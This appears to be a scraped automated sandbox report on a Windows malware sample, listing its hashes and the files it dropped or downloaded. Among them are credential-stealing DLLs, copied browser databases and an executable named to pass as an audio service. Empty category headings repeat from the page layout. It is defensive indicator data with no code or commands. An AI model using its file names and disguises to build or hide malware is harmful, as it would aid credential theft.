Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted URLs

ID:	764033
Product:	CloudBasic
Start time:	10:37:13
Start date:	09.12.2022
Sample:	DQxttu2Qrr.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	7434b42e11380272961c92e061072e78
SHA1:	a2dea715e33a860dc09d09b219db18831e6bb1a5
SHA256:	9922432bfa7768bdfb6e8b079c90744c9f3d33a5a258a97abc8519f81a680e40
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\11164286057916229991747962	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17	DEE86123FE48584BA0CE07793E703560	E80D87A2E55A95BC937AC24525E51AE39D635EF7	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
C:\ProgramData\11693430970401306944494184	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7	FEF7F4B210100663DC7731400BAC534E	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
C:\ProgramData\14765269315554389947119608	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2	CF7758A2FF4A94A5D589DEBAED38F82E	D3380E70D0CAEB9AD78D14DD970EA480E08232B8	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
C:\ProgramData\17061304525933759500214796	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4	4822E6A71C88A4AB8A27F90192B5A3B3	CC07E541426BFF64981CE6DE7D879306C716B6B9	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
C:\ProgramData\44571614278734644827034568	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4	4822E6A71C88A4AB8A27F90192B5A3B3	CC07E541426BFF64981CE6DE7D879306C716B6B9	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
C:\ProgramData\48205952313381291261104955	SQLite 3.x database, last written using SQLite version 3038005, file counter 7, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 7	FEF7F4B210100663DC7731400BAC534E	E3F17C46A2DB6861F22B3F4222B97DCB5EBBD47A	E81118F5C967EA342A16BDEFB28919F8039E772F8BDCF4A65684E3F56D31EA0E
C:\ProgramData\61312899942613011832.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2239A58CC93FD94DC2806CE7F6AF0A0B	F09EB7D69BC7440D3D45E14267236A78AC789FCB	682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
C:\Users\user\1000018002\avicapn32.exe	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows	0F6EF96C5E687631EF27F1DCD1AFE7B4	EA8AEEE11C243E3EACFA6753F708C20CBBA39AAC	38381A42975028B181430A80D6009988D0D0CFA42493D3EFBBFB72D3ABE97648
C:\Users\user\1000019012\syncfiles.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0D079A931E42F554016DB36476E55BA7	D5F1AB52221019C746F1CC59A45CE18D0B817496	EAD2C5AAF92FE07DB45B99587F586C7A45F92C67220CD8113A5D2E7BCB320798
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin	data	85FD3919C3113C160EA76DBFCDB69E26	5189553FA48EDD0CCCD31169F11091FE48D28D42	C7A90D3A3EE42F62540F02E6CAD282F8262D55BADA6D7977DFACD038408AB484
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0D079A931E42F554016DB36476E55BA7	D5F1AB52221019C746F1CC59A45CE18D0B817496	EAD2C5AAF92FE07DB45B99587F586C7A45F92C67220CD8113A5D2E7BCB320798
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows	0F6EF96C5E687631EF27F1DCD1AFE7B4	EA8AEEE11C243E3EACFA6753F708C20CBBA39AAC	38381A42975028B181430A80D6009988D0D0CFA42493D3EFBBFB72D3ABE97648
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	B66347E9A4018F257A6BF1941B4A5D60	0F4A358AD14E441F74C634054D798E6BE2DA476D	D74BF0394DE0AD2ADCFD7ECC96711BAC682F3749F8953701EEFC596B8C11DD36
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\resource[1].bin	data	25B8AC2C67E40924ECAC2C69919D0F2B	717790EEB21A3CE77A5A04E50B295C5EA1B44CC5	5D653986D4C2E30A79A8753F65D0A757DBFE3359990138C73BD6FDFBF12B7D77
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	8F727EA574C46E3FD8901335A6548285	185DCF54761BA6FBA7FE4BFFA32F564C9142968D	D57F75CF079C4EC8C81E51751B3332EF5CE7DC8EBA41B9A5B17DBB4277C20E5C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	7A5155B804E592D83F8319CBDB27E164	DA63718377B9086EF7F6DB6B8B88E45062F31749	5EB7B2FD13264F066B10946539EFF6BE750647DE246CF791E57CA4C17B0B9C31
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2B62E02B3581980EE5A1DDA42FA4F3FE	5C36BFA4A4973E8F694D5C077E7312B1C991AEDF	8C46C2AF1CB25BFA8FBBF9D683D72D30DDB2E5D0ECC6BBA997B24714CF2B8C91
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\minor[2].bin	data	BB060F913C31077DB53E3BA747DF6D02	C0184DEDF5B81927218123F4C0E41FABAA090106	C842C3C50C61E6F44292A6B097F4CB27E1C5E26E87B223C5E017996F25C926CC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	2239A58CC93FD94DC2806CE7F6AF0A0B	F09EB7D69BC7440D3D45E14267236A78AC789FCB	682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	79EA83B42F934BED47A1B30D85AB0999	D5AD1B90152F5C698A714FC8044C52571EFCD57B	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2239A58CC93FD94DC2806CE7F6AF0A0B	F09EB7D69BC7440D3D45E14267236A78AC789FCB	682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811
C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	7A5155B804E592D83F8319CBDB27E164	DA63718377B9086EF7F6DB6B8B88E45062F31749	5EB7B2FD13264F066B10946539EFF6BE750647DE246CF791E57CA4C17B0B9C31
C:\Users\user\AppData\Local\Temp\853321935212	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3	2AA81F8E661178C0356A745077A6F304	6B3AEC842EE1F1263E149BEE9967C05109790F80	1025BEC84A2857436C318823F02844346FDCF00FA198C9D63A27F0F4A3444B66
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzpuqn5z.g0g.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjjnzwnv.xjd.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\advapi32.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	ECD0223B882A0FFC6CB684F8202E2FAA	A593370F83C0A9C3FFBD61ED429BCD3A34230D03	A6A1BCC21608031B8166935904D7ACA16512CAB6296A28D924772BEBAF1DD1DB
C:\Users\user\AppData\Local\Temp\jekppnay.tmp	PE32+ executable (GUI) x86-64, for MS Windows	9DE1DECE6C8E92D128133FC779F07AD3	02CC6BD7775D7D024DB6E5AE3DAFE9F8FF001ECB	3C6AC3153ECB32704D9CD808BFA8872275DD7ED0A49E9709A55FC3511A0AAC4B
C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	PE32 executable (GUI) Intel 80386, for MS Windows	8F727EA574C46E3FD8901335A6548285	185DCF54761BA6FBA7FE4BFFA32F564C9142968D	D57F75CF079C4EC8C81E51751B3332EF5CE7DC8EBA41B9A5B17DBB4277C20E5C
C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe	PE32 executable (GUI) Intel 80386, for MS Windows	B66347E9A4018F257A6BF1941B4A5D60	0F4A358AD14E441F74C634054D798E6BE2DA476D	D74BF0394DE0AD2ADCFD7ECC96711BAC682F3749F8953701EEFC596B8C11DD36
C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2B62E02B3581980EE5A1DDA42FA4F3FE	5C36BFA4A4973E8F694D5C077E7312B1C991AEDF	8C46C2AF1CB25BFA8FBBF9D683D72D30DDB2E5D0ECC6BBA997B24714CF2B8C91
C:\Users\user\Locktime\RtkAudUService64.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	7A5155B804E592D83F8319CBDB27E164	DA63718377B9086EF7F6DB6B8B88E45062F31749	5EB7B2FD13264F066B10946539EFF6BE750647DE246CF791E57CA4C17B0B9C31
C:\Windows\System32\drivers\etc\hosts	ASCII text, with CRLF line terminators	7B1D6A1E1228728A16B66C3714AA9A23	8B59677A3560777593B1FA7D67465BBD7B3BC548	3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
\Device\ConDrv	ASCII text, with no line terminators	509B054634B6DE74F111C3E646BC80FD	99B4C0F39144A92FE42E22473A2A2552FB16BD13	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
\Device\Mup\computer\PIPE\samr	GLS_BINARY_LSB_FIRST	080E701E8B8E2E9C68203C150AC7C6B7	4EF041621388B805758AE1D3B122F9D364705223	FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D

Windows Analysis Report DQxttu2Qrr.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted URLs

Windows Analysis Report
DQxttu2Qrr.exe